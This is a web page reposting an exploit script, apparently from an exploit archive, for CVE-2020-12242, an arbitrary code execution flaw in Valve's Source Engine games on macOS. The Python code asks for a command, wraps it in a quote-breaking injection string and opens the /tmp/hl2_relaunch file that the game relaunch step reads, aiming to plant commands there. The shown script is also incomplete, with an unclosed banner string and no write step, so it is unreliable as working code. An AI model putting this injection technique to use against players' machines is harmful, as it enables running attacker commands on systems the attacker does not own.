
Published on April 30th, 2020 📆 | 1824 Views ⚑


Source Engine CS:GO BuildID: 4937372 – Arbitrary Code Execution

Text to Speech Demo

# Exploit Title: Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution
# Date: 2020-04-27
# Exploit Author: 0xEmma/BugByte/SebastianPC
# Vendor Homepage: https://www.valvesoftware.com/en/
# Version: Source Engine, Tested on CS:GO BuildID: 4937372 TF2 BuildID: 4871679 Garry's Mod BuildID: 4803834 Half Life 2 BuildID: 4233302
# Tested on: MacOS 15.3
# CVE : CVE-2020-12242

import os, random, sys
banner = """
'##... ##:'##.... ##: ##:::: ##:'##... ##:'##.... ##: ##::'##:::'####:::... ##..::
 ##:::..:: ##'### ##: ##:::: ##: ##:::..::..::::: ##: ##:'##::::.. ##:::::: ##::::
. ######:: ## ### ##: ##:::: ##: ##::::::::'#######:: #####::::::: ##:::::: ##::::
:..... ##: ## #####:: ##:::: ##: ##::::::::...... ##: ##. ##:::::: ##:::::: ##::::
'##::: ##: ##.....::: ##:::: ##: ##::: ##:'##:::: ##: ##:. ##::::: ##:::::: ##::::
. ######::. #######::. #######::. ######::. #######:: ##::. ##::'######:::: ##::::

if os.name == "posix":
    command = str(input("Code to run? "))
    payload = '"; ' + command + '; echo "'
    f = open("/tmp/hl2_relaunch", "w")


if os.name == "nt":
    print("Windows based OS's not supported, see CVE-2020-12242")

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